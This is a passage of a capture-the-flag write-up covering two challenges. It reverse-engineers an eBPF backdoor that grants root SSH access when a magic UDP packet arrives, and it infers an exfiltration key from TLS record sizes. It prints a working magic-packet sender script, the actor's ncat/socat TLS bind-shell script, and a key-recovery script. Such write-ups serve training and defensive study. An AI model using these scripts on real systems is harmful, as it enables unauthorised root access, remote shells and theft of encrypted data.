libbpf: prog '%s': relo #%d: patched insn #%d (LDX/ST/STX) off %u -> %u
libbpf: prog '%s': relo #%d: insn #%d (LDX/ST/STX) unexpected mem size: got %d, exp %u
libbpf: prog '%s': relo #%d: insn #%d (LDX/ST/STX) invalid new mem size: %u
libbpf: prog '%s': relo #%d: patched insn #%d (LDX/ST/STX) mem_sz %u -> %u
libbpf: prog '%s': relo #%d: insn #%d (LDIMM64) has unexpected form
[...]

Keeping in mind that the challenge description mentioned a backdoor, it can be concluded that the shared object might be responsible for initializing one or more eBPF programs for that purpose. In fact, as shown by the command bpftool perf, there are three eBPF programs installed that are associated with the cron process (pid 974):

root@egghunt:~# bpftool perf
pid 974  fd 9: prog_id 16  tracepoint  netif_receive_skb
pid 974  fd 10: prog_id 17  uprobe  filename /lib/x86_64-linux-gnu/libc.so.6  offset 1174224
pid 974  fd 11: prog_id 18  uretprobe  filename /lib/x86_64-linux-gnu/libc.so.6  offset 1174224

In the listing above, the program names are not shown. However, their names can be retrieved, for example by using the dump subcommand, which also prints the respective function signatures:

root@egghunt:~# bpftool prog dump xlated id 16 | head -n 1
int kprobe_netif_receive_skb(struct netif_receive_skb_args * args):
root@egghunt:~# bpftool prog dump xlated id 17 | head -n 1
int getspnam_r_entry(long long unsigned int * ctx):
root@egghunt:~# bpftool prog dump xlated id 18 | head -n 1
int getspnam_r_exit(long long unsigned int * ctx):

According to the documentation, the netif_receive_skb() function processes all network receive buffers. The Linux kernel offers a tracepoint in that function, to which the first eBPF program is attached. The two other programs are attached as uprobes (entry and return) to the libc function getspnam_r(), which is used to retrieve password entries from the shadow file. Probes on the entry and exit of that function, combined with the tracepoint on netif_receive_skb, are perfect ingredients for an eBPF-based backdoor: A working hypothesis would be that as soon as a magic network packet is detected via the tracepoint, the uprobes would tamper with a returned shadow password entry, thereby allowing an attacker to bypass authentication mechanisms relying on getspnam_r().

In the context of a suspected backdoor, this makes perfect sense. The eBPF instructions of the first program, which is presumably responsible for packet introspection, can be dumped as follows:

root@egghunt:~# bpftool prog dump xlated id 16
   0: (b7) r2 = 0
   1: (63) *(u32 *)(r10 -8) = r2
   2: (7b) *(u64 *)(r10 -16) = r2
   3: (7b) *(u64 *)(r10 -24) = r2
[...]
  29: (7b) *(u64 *)(r10 -232) = r2
  30: (7b) *(u64 *)(r10 -240) = r2
  31: (7b) *(u64 *)(r10 -248) = r2
  32: (7b) *(u64 *)(r10 -256) = r2
[...]

At the beginning, 252 bytes of memory are initialized with zero. At instruction 38, bpf_probe_read_compat is used to copy struct sk_buff (224 bytes) pointed to by args->skbaddr (see the previously shown tracepoint signature) into the newly initialized memory of the eBPF program. The destination pointer r1 is derived from r10 by subtracting the offset 256. The size of 224 bytes is stored in r2, and r3 points to the memory that is about to be copied.

  33: (79) r3 = *(u64 *)(r1 +8)
  34: (bf) r6 = r10
  35: (07) r6 += -256
  36: (bf) r1 = r6
  37: (b7) r2 = 224
  38: (85) call bpf_probe_read_compat#-54752

Similarly, bpf_probe_read_compat is called at instructions 48 and 69 to copy the IP header (20 bytes) and the UDP header (8 bytes) to eBPF memory, respectively. The resulting memory layout of the eBPF program can be illustrated as follows:

Offset relative to r10 / bytes   Size / bytes   Linux Data Structure
-256                             224            struct sk_buff
-32                              8              struct udphdr
-24                              20             struct iphdr

The copied headers are then parsed and certain fields are checked to ensure that the backdoor is activated only by a magic packet. By analyzing the corresponding code of each check, it is possible to compile a list of conditions that the magic packet must meet. If any of the checks are not met, the program jumps to an early exit.

Condition: iphdr.version: IPv4

  50: (bf) r1 = r10
  51: (07) r1 += -24
  52: (71) r1 = *(u8 *)(r1 +0)
  53: (57) r1 &= 240
  54: (55) if r1 != 0x40 goto pc+236

Explanation: These instructions parse the version field of struct iphdr. The IP version must be 4.

Condition: iphdr.protocol: UDP

  55: (bf) r1 = r10
  56: (07) r1 += -24
  57: (71) r1 = *(u8 *)(r1 +9)
  58: (55) if r1 != 0x11 goto pc+232

Explanation: These instructions parse the protocol field of struct iphdr. The protocol must be UDP.

Condition: iphdr.ihl: 5 (20 bytes)

  59: (bf) r1 = r10
  60: (07) r1 += -24
  61: (71) r1 = *(u8 *)(r1 +0)
  62: (57) r1 &= 15
  63: (55) if r1 != 0x5 goto pc+227

Explanation: These instructions parse the IP header length field (ihl) of struct iphdr. The IP header length must be 5×32-bit words (20 bytes).

Condition: udphdr.dest: 1337

  71: (bf) r1 = r10
  72: (07) r1 += -32
  73: (69) r1 = *(u16 *)(r1 +2)
  74: (55) if r1 != 0x3905 goto pc+216

Explanation: These instructions parse the destination port field of struct udphdr. The destination port must be 1337. The field is stored in network (big-endian) byte order as 0x0539, which reads as 0x3905 when loaded as a little-endian 16-bit value.

Condition: udphdr.len: 42

  75: (bf) r1 = r10
  76: (07) r1 += -32
  77: (69) r1 = *(u16 *)(r1 +4)
  78: (55) if r1 != 0x2a00 goto pc+212

Explanation: These instructions parse the len field of struct udphdr. The length must be 42 bytes (0x002a in network byte order, 0x2a00 when loaded as a little-endian value). Subtracting the size of the UDP header (8 bytes), this leaves 34 bytes for a payload.
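The five header checks can be replayed outside the kernel to see why the byte-swapped constants appear. The following is a minimal Python sketch, not the implant's code: is_magic_packet and build_headers are hypothetical helper names, and the source port, TTL and addresses are arbitrary placeholder values.

```python
import struct

def is_magic_packet(ip_header: bytes, udp_header: bytes) -> bool:
    """Hypothetical helper mirroring the five header checks listed above."""
    version = ip_header[0] & 0xF0   # like `r1 &= 240`, compared against 0x40
    ihl = ip_header[0] & 0x0F       # like `r1 &= 15`, compared against 5
    protocol = ip_header[9]         # 0x11 means UDP
    # The eBPF code loads the 16-bit fields without converting them from
    # network byte order, so they are read here as little-endian values.
    dest, length = struct.unpack_from("<HH", udp_header, 2)
    return (version == 0x40 and protocol == 0x11 and ihl == 5
            and dest == 0x3905 and length == 0x2A00)

def build_headers(dport: int, payload_len: int):
    """Build minimal IPv4 and UDP headers (checksums left at zero)."""
    addr = bytes([127, 0, 0, 1])    # placeholder address
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + 8 + payload_len,
                     0, 0, 64, 17, 0, addr, addr)
    udp = struct.pack("!HHHH", 40000, dport, 8 + payload_len, 0)
    return ip, udp

# Port 1337 is 0x0539 on the wire and 0x3905 when loaded as little-endian.
swapped_port = struct.unpack("<H", struct.pack("!H", 1337))[0]
print(hex(swapped_port))                           # 0x3905
print(is_magic_packet(*build_headers(1337, 34)))   # True
print(is_magic_packet(*build_headers(1337, 33)))   # False
```

Any packet that fails one of these comparisons corresponds to the early exit taken by the conditional jumps in the listing.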

After parsing the IP and UDP headers, the eBPF program processes the UDP packet’s payload. First, the 34-byte payload is copied into the eBPF memory. The destination buffer is located relative to r10 with an offset of -296 bytes:

  86: (bf) r1 = r10
  87: (07) r1 += -296
  88: (b7) r2 = 34
  89: (bf) r3 = r6
  90: (85) call bpf_probe_read_compat#-54752

An updated eBPF memory layout looks like this:

Offset relative to r10 / bytes   Size / bytes   (Linux) Data Structure
-296                             34             UDP payload
-262                             6              unused/alignment
-256                             224            struct sk_buff
-32                              8              struct udphdr
-24                              20             struct iphdr
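The offsets in this layout follow from simple arithmetic on the region sizes. As a quick sanity check, the following Python sketch recomputes them; the region list is taken from the table, and the helper name layout is only illustrative.

```python
# (name, size in bytes), ordered from the lowest stack address upward
REGIONS = [
    ("UDP payload", 34),
    ("unused/alignment", 6),
    ("struct sk_buff", 224),
    ("struct udphdr", 8),
    ("struct iphdr", 20),
]

def layout(regions, base=-296):
    """Return (offset, size, name) rows plus the offset just past the last region."""
    rows = []
    offset = base
    for name, size in regions:
        rows.append((offset, size, name))
        offset += size
    return rows, offset

rows, end = layout(REGIONS)
for offset, size, name in rows:
    print(f"{offset:>5} {size:>4}  {name}")
print("end of used stack area:", end)
```

The last region ends at r10-4, so the three header structures span 252 bytes starting at r10-256, which matches the amount of memory zeroed at the start of the program.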

Afterward, the first three bytes of the buffer are validated:

  91: (71) r1 = *(u8 *)(r10 -296)
  92: (55) if r1 != 0x66 goto pc+198
  93: (71) r1 = *(u8 *)(r10 -295)
  94: (55) if r1 != 0x73 goto pc+196
  95: (71) r1 = *(u8 *)(r10 -294)
  96: (55) if r1 != 0x66 goto pc+194

The first three bytes of the payload must be \x66\x73\x66, which correspond to the ASCII characters fsf. If the required pattern is found, the first three bytes are overwritten with $1$ (which is also the result of XORing fsf byte-wise with the value 66):

  97: (b7) r1 = 36
  98: (73) *(u8 *)(r10 -294) = r1
  99: (b7) r1 = 12580
 100: (6b) *(u16 *)(r10 -296) = r1

The remaining 31 bytes of the buffer are each XORed byte-wise with a fixed value of 66:

 101: (71) r1 = *(u8 *)(r10 -293)
 102: (a7) r1 ^= 66
 103: (73) *(u8 *)(r10 -293) = r1
 104: (71) r1 = *(u8 *)(r10 -292)
 105: (a7) r1 ^= 66
 106: (73) *(u8 *)(r10 -292) = r1
[...]
 191: (71) r1 = *(u8 *)(r10 -263)
 192: (a7) r1 ^= 66
 193: (73) *(u8 *)(r10 -263) = r1
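The constants in these listings can be verified with a few lines of Python. This is a minimal sketch of the deobfuscation step as described above; deobfuscate is a hypothetical helper name, and the sample payload is made up for illustration.

```python
XOR_KEY = 66  # 0x42, the constant used by the `r1 ^= 66` instructions

def deobfuscate(payload: bytes) -> bytes:
    """Hypothetical helper: undo the byte-wise XOR of a 34-byte magic payload."""
    if len(payload) != 34 or not payload.startswith(b"fsf"):
        raise ValueError("not a magic payload")
    # XORing all 34 bytes is equivalent to what the program does: it writes
    # the constant "$1$" and XORs only the remaining 31 bytes.
    return bytes(b ^ XOR_KEY for b in payload)

# The marker "fsf" is simply "$1$" XORed with 66.
marker = bytes(b ^ XOR_KEY for b in b"fsf")

# Instructions 97-100 store 36 ('$') at offset -294 and the 16-bit constant
# 12580 (0x3124) at offset -296, which is "$1" in little-endian byte order.
prefix = (12580).to_bytes(2, "little") + bytes([36])

print(marker, prefix)  # b'$1$' b'$1$'

# Made-up sample: an obfuscated payload and its round trip.
plain = b"$1$" + b"A" * 31
wire = bytes(b ^ XOR_KEY for b in plain)
print(deobfuscate(wire) == plain)  # True
```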

Next, the eBPF program copies the buffer resulting from the XOR operations to memory that belongs to the eBPF map with id=4. Instead of reading and writing the buffer byte-wise, the program uses what looks like an inlined and branchless version of memcpy. This is nothing unusual, though, as the eBPF verifier historically did not allow back edges/loops (newer kernels accept only bounded loops), so such copies are commonly emitted unrolled. While it reads unsigned 64-bit values into a temporary register, each byte is written to the mapped memory individually. This approach requires bit shifting on the temporary register to maintain the original byte order within the destination buffer.

 194: (18) r1 = map[id:4][0]+0
 196: (79) r2 = *(u64 *)(r10 -272)
 197: (bf) r3 = r2
 198: (77) r3 >>= 56
 199: (73) *(u8 *)(r1 +32) = r3
 200: (bf) r3 = r2
 201: (77) r3 >>= 48
 202: (73) *(u8 *)(r1 +31) = r3
 203: (bf) r3 = r2
 204: (77) r3 >>= 40
 205: (73) *(u8 *)(r1 +30) = r3
 206: (bf) r3 = r2
 207: (77) r3 >>= 32
 208: (73) *(u8 *)(r1 +29) = r3
 209: (bf) r3 = r2
 210: (77) r3 >>= 24
 211: (73) *(u8 *)(r1 +28) = r3
 212: (bf) r3 = r2
 213: (77) r3 >>= 16
 214: (73) *(u8 *)(r1 +27) = r3
 215: (bf) r3 = r2
 216: (77) r3 >>= 8
 217: (73) *(u8 *)(r1 +26) = r3
 218: (73) *(u8 *)(r1 +25) = r2
[...]
 283: (bf) r3 = r2
 284: (77) r3 >>= 16
 285: (73) *(u8 *)(r1 +3) = r3
 286: (73) *(u8 *)(r1 +1) = r2
 287: (77) r2 >>= 8
 288: (73) *(u8 *)(r1 +2) = r2
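To illustrate why the shifts preserve the byte order, the following Python sketch emulates the copy pattern from the listing: a 64-bit little-endian load followed by eight single-byte stores. The function names are hypothetical, and the way the trailing two bytes are handled is an assumption, since that part of the listing is elided.

```python
def copy_u64_bytewise(src: bytes, src_off: int, dst: bytearray, dst_off: int) -> None:
    """Emulate one unrolled chunk: load a u64, store it one byte at a time."""
    value = int.from_bytes(src[src_off:src_off + 8], "little")  # r2 = *(u64 *)(...)
    for k in range(8):
        # r3 = r2; r3 >>= 8*k; *(u8 *)(r1 + dst_off + k) = r3
        dst[dst_off + k] = (value >> (8 * k)) & 0xFF

def emulate_copy(payload: bytes) -> bytearray:
    """Copy the payload to offsets 1..len(payload) of a zeroed destination buffer."""
    dst = bytearray(1 + len(payload))
    full = len(payload) - len(payload) % 8
    for off in range(0, full, 8):
        copy_u64_bytewise(payload, off, dst, 1 + off)
    for off in range(full, len(payload)):  # tail bytes (assumed handling)
        dst[1 + off] = payload[off]
    return dst

payload = bytes(range(34))
copied = emulate_copy(payload)
print(bytes(copied[1:]) == payload)  # True
```

Shifting by 8*k and truncating to one byte extracts the k-th byte of the little-endian value, so byte k of each chunk lands at destination offset k, exactly as in the listing where the unshifted value goes to r1+25 and the value shifted by 56 goes to r1+32.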

The whole buffer, which is 34 bytes in size, is copied into a memory region that is accessed through a base pointer stored in register r1. So far, only offsets within the range [1..34] are used for storing the buffer. Offset 0 is used to store the fixed value 1 as the following code shows:

 289: (b7) r2 = 1
 290: (73) *(u8 *)(r1 +0) = r2

The layout of the memory region can be illustrated as follows:

Offset relative to r1 / bytes   Size / bytes   Data Structure
0                               1              Flag set to 1 unconditionally
+1                              34             34-byte buffer “$1$...”

Finally, the last part of the eBPF program sets its return value to 0 before the exit instruction is executed.

 291: (b7) r0 = 0
 292: (95) exit

After reverse engineering this eBPF tracepoint in depth, a pretty accurate understanding of its functionality has been established. The upside of this approach is that it yields exact information, but the downside is that it can be pretty time-consuming. Another valid approach, especially during a capture-the-flag event, would be to focus on a few key parts of the code and try to conclude what the whole code likely does. Then, analyzing previously skipped code only becomes necessary if further analysis generates doubts about previous assumptions or if it is concluded that an assumption is missing a relevant part.

For example, the port 1337/UDP was already known from the run.sh script. Searching the eBPF code for that number would allow the analyst to skip the first 70ish instructions while still being able to conclude that the memory accessed for the port comparison is likely a field of the UDP header. Similarly, the XOR operations and the extensive copy instructions could have been skipped without losing too much confidence. Key questions that still would have required reverse engineering could have been reduced to:

  • How long is the payload?
  • What is the structure of the payload?
  • What is the presumed function of a certain payload?

This strategy will be applied for the rest of this writeup. Without looking at the code of the two getspnam_r() probes, it is a reasonable assumption that the code reads from the mapped memory region and might use the data from the UDP payload to manipulate returned /etc/shadow entries via the bpf_probe_write_user() function. Revisiting the previous listing of eBPF programs, it can be seen that the assumed exit hook of getspnam_r() is in fact allowed to access the eBPF map with id=4.

root@egghunt:~# bpftool prog list
[...]
16: tracepoint  name kprobe_netif_re  tag e0d014d973f44213  gpl
	loaded_at 2021-03-23T12:20:05+0000  uid 0
	xlated 2344B  jited 1544B  memlock 4096B  map_ids 4
	btf_id 5
17: kprobe  name getspnam_r_entr  tag acab388c8f8ef0f9  gpl
	loaded_at 2021-03-23T12:20:05+0000  uid 0
	xlated 336B  jited 223B  memlock 4096B  map_ids 3
	btf_id 5
18: kprobe  name getspnam_r_exit  tag ceeabb4ac5b9ed45  gpl
	loaded_at 2021-03-23T12:20:05+0000  uid 0
	xlated 328B  jited 209B  memlock 4096B  map_ids 3,4
	btf_id 5

Luckily, bpftool provides a convenient way to list and dump eBPF maps:

root@egghunt:~# bpftool map list
[...]
4: array  name implant_.bss  flags 0x400
	key 4B  value 36B  max_entries 1  memlock 8192B
	btf_id 5
root@egghunt:~# bpftool map dump id 4
[{
        "value": {
            ".bss": [{
                    "backdoor": {
                        "enabled": false,
                        "hash": ""
                    }
                }
            ]
        }
    }
]

The dumped map layout aligns nicely with the layout that was obtained through reverse engineering the code of the netif_receive_skb tracepoint. The previously unidentified flag appears to be a simple on/off switch, judging by the name enabled, while the 34-byte buffer is named hash. A plausible explanation would be that the netif_receive_skb tracepoint code is responsible for deobfuscating and storing a crypt password hash in the mapped memory region before enabling the on/off switch. Then, the getspnam_r_exit probe would check the eBPF map in order to determine whether a magic UDP packet has already been received. In that case, it would return that password hash instead of the entry from the shadow file, allowing the attacker to log in as any user with a password of their choice. To test this hypothesis, a password hash for “foobar” is generated:

$ echo -ne foobar | openssl passwd -1 -in - 
$1$1HwFxqXw$EMuwnpKPPReu.AcjXt4km.

The resulting salted MD5 hash is exactly 34 characters long. Shown below is a short Python script that obfuscates the password hash as expected by the tracepoint and sends the UDP magic packet to an arbitrary destination address:

$ cat send-hash.py 
#!/usr/bin/env python3

import socket
import sys

pwd_hash = '$1$1HwFxqXw$EMuwnpKPPReu.AcjXt4km.'
data = bytes([b^66 for b in pwd_hash.encode()])
assert(data.startswith(b'fsf'))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(data, (sys.argv[1], int(sys.argv[2])))

The script can be invoked with the destination IP and port as arguments that, in this case, target the local challenge VM:

$ ./send-hash.py 127.0.0.1 1337

After sending the magic UDP packet, the eBPF map with id=4 can be dumped again:

root@egghunt:~# bpftool map dump id 4
[{
        "value": {
            ".bss": [{
                    "backdoor": {
                        "enabled": true,
                        "hash": "$1$1HwFxqXw$EMuwnpKPPReu.AcjXt4km."
                    }
                }
            ]
        }
    }
]

Indeed, the desired password hash has been stored and the enabled flag has been set to true. Finally, we can verify our assumptions about the uprobes by trying to log in as root via SSH using the password “foobar”:

$ ssh -p 4422 root@127.0.0.1
[...]
root@127.0.0.1's password: foobar
Welcome to Ubuntu 20.10 (GNU/Linux 5.8.0-33-generic x86_64)
[...]
Last login: Thu Jan 14 12:14:16 2021
root@egghunt:~# id
uid=0(root) gid=0(root) groups=0(root)

This confirms that we understand sufficiently well how the backdoor works. We can now use the same Python script to send the magic packet to the remote machine and then log in via SSH with the password “foobar” to retrieve the flag:

$ ssh root@egghunt.challenges.adversary.zone
root@egghunt.challenges.adversary.zone's password: foobar
PTY allocation request failed on channel 0
CS{ebpf_b4ckd00r_ftw}
Connection to egghunt.challenges.adversary.zone closed.

Challenge 4: Exfiltrat0r

The following description was given for the final challenge in the PROTECTIVE PENGUIN track:

Additional analysis of the victim network allowed us to recover some PROTECTIVE PENGUIN tooling that appears to provide remote shell and data exfiltration capabilities. While we were able to capture some network traffic of these tools in action, all communications are encrypted. We have wrapped all relevant information into a TAR archive.

Are you able to identify any weaknesses that would allow us to recover the encryption key and figure out what data was exfiltrated?

As shown in the following listing, extracting the provided TAR archive leaves us with three files:

$ tar xfv exfiltrat0r.tar.gz
cryptshell.sh
exfil.py
trace.pcapng

Consistent with the challenge description, the file cryptshell.sh provides functionality that spawns or connects to a TLS-based interactive bind shell:

#!/bin/sh

listen() {
    exec ncat -lvk4 $1 $2 --ssl -c 'python3 -c "import pty;pty.spawn(\"/bin/bash\")"'
}

connect() {
    exec socat -,raw,echo=0 SSL:$1:$2,verify=0
    #exec socat - SSL:$1:$2,verify=0
}

if [ $# -eq 3 ] && [ $1 = "listen" ] ; then
    listen $2 $3
fi

if [ $# -eq 3 ] && [ $1 = "connect" ] ; then
    connect $2 $3
fi

It can be invoked as follows to spawn a bind shell that can be accessed through TLS:

$ ./cryptshell.sh listen 127.0.0.1 1024
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. [...]
Ncat: SHA-1 fingerprint: A568 2AA2 231C DDED 02B9 81E2 [...]
Ncat: Listening on 127.0.0.1:1024

The script can then be used to connect and interact with that shell:

$ ./cryptshell.sh connect 127.0.0.1 1024
id
uid=1000(user) gid=1000(user) groups=1000(user)

Keeping the initial challenge description in mind, it is clear that this is the remote shell tool that was used by the actor to interact with the compromised host.

From a quick glance at the Python script exfil.py, it seems like it implements functionality to exfiltrate files to a given remote host. These files are encrypted on the fly. This is also in line with the challenge description that mentions the exfiltration of files from the compromised host and asks us to recover their encryption key or content.

As can be seen in the tool’s usage message, it requires a remote host, a port and at least one file path:

$ ./exfil.py
usage: exfil.py [-h] [-k KEY] host port file [file ...]
exfil.py: error: the following arguments are required: host, port, file

If no key is provided on the command line through the -k parameter, the tool prints a prompt and enters an interactive key entry mode that displays each entered character as colorized ASCII art.

Finally, the provided PCAP file trace.pcapng was further analyzed in Wireshark. As mentioned in the description, it seems to contain traffic that belongs to the aforementioned tools. As can be seen using Wireshark’s Conversations window, the PCAP contains four distinct TCP connections.

The first connection was initiated from a client, 192.168.122.1, to a service listening on 192.168.122.251:31337, while the three following ones are outgoing connections from 192.168.122.251. A quick look at the first connection shows that its data is encapsulated in TLS. Therefore, that connection can likely be tied back to the actor’s TLS bind shell tool cryptshell.sh and was used to interact with the compromised host. An educated guess about the subsequent three connections is that they were opened by the Python-based exfiltration tool and contain the encrypted data of the exfiltrated files that we’re trying to recover.

Reviewing how encryption is used in the exfiltration tool does not show any immediate weaknesses. The tool uses ChaCha20-Poly1305 as an authenticated stream cipher with uniquely derived cipher keys (based on the key that was provided to exfil.py) for each file to encrypt and authenticate the content. This leaves us with the TLS connection that the attacker used to interact with the host. At first glance, that also might seem like a dead end, as all data within that stream is strongly encrypted. However, a look at the individual TLS records that were exchanged makes clear that we might be able to derive some information about the attacker’s interactions with the host solely based on the TLS record sizes.

The following tshark command can be used to gain a quick overview of the individual packets’ TLS record lengths:

$ tshark -T fields -e ip.src -e ip.dst -e tls.record.length -r trace.pcapng tls
[...]
192.168.122.251	192.168.122.1	23
192.168.122.251	192.168.122.1	20
192.168.122.251	192.168.122.1	177
192.168.122.251	192.168.122.1	393
192.168.122.251	192.168.122.1	465
192.168.122.251	192.168.122.1	381
192.168.122.251	192.168.122.1	117
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	194
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	572
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	817
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	1050
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	1341
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	1618
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	1848
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	2159
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	2456
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	2661
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	2952
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	3283
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	3646
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	157
192.168.122.251	192.168.122.1	160
192.168.122.251	192.168.122.1	157
192.168.122.251	192.168.122.1	19
192.168.122.251	192.168.122.1	77
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	23
192.168.122.251	192.168.122.1	19

Especially interesting is the sequence in which the client (192.168.122.1) sends multiple 18-byte TLS records that are each followed by an increasingly large response from the server. This pattern might originate from the interactive key prompt that we saw earlier when looking at the exfiltration program. Each 18-byte record could represent a single keystroke that is followed by the ASCII art response displaying the characters entered so far.

That assumption is further supported by the fact that the server sends a couple of records with a significant amount of content right before that sequence, which could correspond to the initially printed “Enter key:” prompt:

[...]
192.168.122.251	192.168.122.1	177
192.168.122.251	192.168.122.1	393
192.168.122.251	192.168.122.1	465
192.168.122.251	192.168.122.1	381
192.168.122.251	192.168.122.1	117
[...]

Further in line with our assumptions is that immediately after the suspected keystroke sequence ends, the server opens the three outgoing TCP connections, which likely contain the encrypted data of the exfiltrated files.
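The keystroke pattern can also be extracted programmatically instead of by eye. The following Python sketch parses the tail of the tshark output shown above and collects the server records that directly follow an 18-byte client record. The function names are hypothetical, and the parser assumes one record length per output line, as in the listing.

```python
CLIENT = "192.168.122.1"

# Tail of the tshark output shown above: source, destination, TLS record length.
TSHARK_OUTPUT = """\
192.168.122.251 192.168.122.1 117
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 194
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 572
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 817
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 1050
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 1341
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 1618
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 1848
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 2159
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 2456
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 2661
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 2952
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 3283
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 3646
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 157
192.168.122.251 192.168.122.1 160
192.168.122.251 192.168.122.1 157
192.168.122.251 192.168.122.1 19
192.168.122.251 192.168.122.1 77
192.168.122.1 192.168.122.251 18
192.168.122.251 192.168.122.1 23
192.168.122.251 192.168.122.1 19
"""

def parse(text):
    """Turn whitespace-separated tshark field output into (src, dst, length) rows."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, dst, length = line.split()
        rows.append((src, dst, int(length)))
    return rows

def keystroke_responses(rows, client=CLIENT, keystroke_len=18):
    """Sizes of server records that directly follow an 18-byte client record."""
    return [nxt[2] for cur, nxt in zip(rows, rows[1:])
            if cur[0] == client and cur[2] == keystroke_len and nxt[0] != client]

def growing_run(sizes):
    """Leading run of strictly increasing sizes (the growing ASCII art output)."""
    run = []
    for size in sizes:
        if run and size <= run[-1]:
            break
        run.append(size)
    return run

responses = keystroke_responses(parse(TSHARK_OUTPUT))
key_echoes = growing_run(responses)
print(len(key_echoes), key_echoes)
```

On this excerpt, the strictly growing run contains 13 response sizes, from 194 to 3646 bytes. The two later responses (157 and 23 bytes) do not continue the growth and are dropped.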

Based on this preliminary analysis, we further investigated whether the observed packet sizes indeed allow us to infer which key was entered. From the number of keystroke/response packet pairs, we can derive that the entered key seems to consist of 13 characters. As can be seen in Wireshark, the TLS connection uses AES-256-GCM-SHA384 as its cipher suite, which provides an authenticated stream cipher based on AES. Therefore, we should be able to accurately infer the exact size of the underlying plaintext content, as no padding is added to the packets (as opposed to a mode working on full blocks). However, the cipher suite does add some additional data used for authentication, so the TLS application data sizes do not exactly match the sizes of the ASCII art characters that are hard-coded in the exfiltration program.

A quick local test, using the tools in a similar fashion as the actor and observing the TLS packet sizes, suggested a fixed overhead of 22 bytes per TLS application data packet. Taking this into account, we wrote the following Python script that enumerates all viable key candidates by using the exfiltration script’s main ASCII art output class AsciiSequence to compute the expected output size for each candidate:

#!/usr/bin/env python3

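import string
from functools import reduce  # used for the final combination count
from operator import mul      # used for the final combination count
from pprint import pprint
from collections import defaultdict
from exfil import AsciiSequence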

# the record lengths extracted using the tshark command:
SIZES = [
    194,
    572,
    817,
    1050,
    1341,
    1618,
    1848,
    2159,
    2456,
    2661,
    2952,
    3283,
    3646,
]

OVERHEAD = 22

candidates = defaultdict(list)

for i, size in enumerate(SIZES):
    seq = AsciiSequence()

    for j in range(len(candidates)):
        seq.add_char(candidates[j][0])

    for candidate in string.printable:
        total = 0

        if seq.plain_chars:
            total += len(seq.clear())

        seq.add_char(candidate)
        try:
            total += len(seq.render())
        except IndexError:
            seq.pop()
            continue

        if total + OVERHEAD == size:
            candidates[i].append(candidate)

        seq.pop()


print("Candidates")
pprint(dict(candidates))
print("Combinations:", reduce(mul, map(len, candidates.values()), 1))

Executing the script gives us the following output showing the possible candidates per position of the key:

$ ./candidates.py
Candidates
{0: ['m'],
 1: ['g', 'y', 'O'],
 2: ['-', '_'],
 3: ['s', '"', ';', '\\'],
 4: ['3', 'k', 'F', 'T'],
 5: ['c'],
 6: ['r'],
 7: ['3', 'k', 'F', 'T'],
 8: ['7', 't'],
 9: ['-', '_'],
 10: ['3', 'k', 'F', 'T'],
 11: ['3', 'k', 'F', 'T'],
 12: ['g', 'y', 'O']}
Combinations: 73728

This leaves us with a total of 73,728 potential keys, among which we could easily find the correct one by brute force. However, a look at the candidate dictionary quickly shows that the key is likely either my_s3cr3t_k3y or my-s3cr3t-k3y.
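For completeness, the brute-force route would start by enumerating every combination of the per-position candidates. The following Python sketch does that with itertools.product, using the candidate dictionary from the output above; all_keys is a hypothetical helper name, and math.prod requires Python 3.8 or later.

```python
from itertools import product
from math import prod

# Per-position candidates, copied from the script output above.
CANDIDATES = {
    0: ['m'],
    1: ['g', 'y', 'O'],
    2: ['-', '_'],
    3: ['s', '"', ';', '\\'],
    4: ['3', 'k', 'F', 'T'],
    5: ['c'],
    6: ['r'],
    7: ['3', 'k', 'F', 'T'],
    8: ['7', 't'],
    9: ['-', '_'],
    10: ['3', 'k', 'F', 'T'],
    11: ['3', 'k', 'F', 'T'],
    12: ['g', 'y', 'O'],
}

def all_keys(candidates):
    """Yield every key that is consistent with the per-position candidates."""
    positions = [candidates[i] for i in sorted(candidates)]
    for combo in product(*positions):
        yield "".join(combo)

total = prod(len(chars) for chars in CANDIDATES.values())
keys = set(all_keys(CANDIDATES))

print(total)                    # 73728
print("my_s3cr3t_k3y" in keys)  # True
print("my-s3cr3t-k3y" in keys)  # True
```

Each generated key could then be tried against one of the captured streams, since a wrong key fails the cipher's authentication check.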

As a next step, we extracted the data of the three TCP streams by using tcpflow:

$ tcpflow -r trace.pcapng "dst port 1234"
$ ls *1234*
192.168.122.251.57760-192.168.122.001.01234  192.168.122.251.57764-192.168.122.001.01234
192.168.122.251.57762-192.168.122.001.01234

The following Python script was then implemented in order to decrypt the streams by using the key my_s3cr3t_k3y (attempting decryption with the other key immediately raises an exception due to failure of the cipher’s authentication mechanism):

